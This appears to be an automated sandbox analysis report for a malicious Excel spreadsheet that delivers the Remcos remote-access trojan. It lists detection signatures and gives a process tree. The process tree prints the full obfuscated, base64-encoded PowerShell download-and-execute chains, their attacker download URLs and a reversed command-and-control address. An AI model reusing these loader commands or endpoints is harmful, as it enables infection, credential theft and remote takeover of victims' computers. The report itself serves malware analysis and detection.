Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QPS-36477.xls

Overview

General Information

Sample name:QPS-36477.xls
Analysis ID:1529026
MD5:912e8c547d1e8dd1e12afbd819074b30
SHA1:96fd97dc12ae0a792c85fdf7ec9a2424a90097b3
SHA256:b86e4c334af2fdbe88b3cb50cd85c47eac10a9e9b9ac7c0dd656e37cabce7a5a
Tags:xlsuser-abuse_ch
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3480 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3764 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3852 cmdline: "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3876 cmdline: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3976 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3988 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3ED5.tmp" "c:\Users\user\AppData\Local\Temp\uvrrkyhh\CSC53416C506E684743ABB03B3747B68267.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 4080 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3112 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • powershell.exe (PID: 3232 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
                • RegAsm.exe (PID: 1908 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 1432 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jfaasddkn" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 3512 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\lzfstnomboxo" MD5: 8FE9545E9F72E460723F484C304314AD)
                  • RegAsm.exe (PID: 1120 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\wcklufzfxwpbazt" MD5: 8FE9545E9F72E460723F484C304314AD)
    • mshta.exe (PID: 2988 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3016 cmdline: "C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 1012 cmdline: PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3580 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lkzgbmkm\lkzgbmkm.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 2196 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES87A7.tmp" "c:\Users\user\AppData\Local\Temp\lkzgbmkm\CSCA61F80875D1340AC807DD81469F56ED.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 3644 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3744 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • powershell.exe (PID: 3784 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
                • RegAsm.exe (PID: 4072 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

